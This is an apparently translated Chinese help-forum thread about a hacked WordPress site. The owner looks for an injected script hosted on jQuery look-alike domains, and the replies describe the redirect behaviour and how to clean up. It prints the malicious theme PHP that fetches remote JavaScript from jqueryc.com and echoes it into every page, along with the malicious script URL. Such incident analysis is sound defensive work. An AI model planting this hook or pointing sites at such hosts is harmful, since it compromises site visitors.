我的网站被黑了,我一辈子都找不到它被注入的地方。我已采取必要的预防措施以确保它不会再次发生,并且我正在将我的网站从备份恢复到更早的时间,但我想知道在哪里可以找到它,以防它发生在我托管的另一个网站上。
这是恶意脚本:http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js
这是网站:(现已删除)
我到处检查过,但都没有成功。
任何帮助将不胜感激。
谢谢你。
**对于那些投票给我的人,我已经做了很多研究,试图在过去的 4 个小时里自己解决这个问题,我的腿上有一个 11 个月大的孩子。我只是在万不得已的情况下才发布这个问题,因为我自己没有成功地做到这一点。由于过去我从这里的人那里得到了很大的帮助,所以我认为问一下也无妨。
写下所有评论作为答案,因为这里有很好的信息来对抗漏洞利用。
在 Wordpress 驱动的站点的源代码中发现了一个带有冒充 jQuery CDN 的 URL 的脚本。听起来 jquerys.com 和 jqueryc.com 都被用作冒名顶替的域。
恶意代码很简单;它随机重定向到另一个站点并设置一个 cookie 以防止立即重定向(每天一次)。由于它不常见,因此在开发站点时可能永远不会看到它,或者忽略它。
开始:http ://codex.wordpress.org/FAQ_My_site_was_hacked
OP 在主题中找到了这段代码:
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){
$url="jqueryc.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
查看源码,其实有两个对jQuery的引用;一种合法,一种不合法。删除上述代码片段可以解决问题。
确定恶意代码的来源(例如主题、插件或受感染的服务器)仍然很重要。如果不检查它们是否存在恶意代码,则不应恢复备份。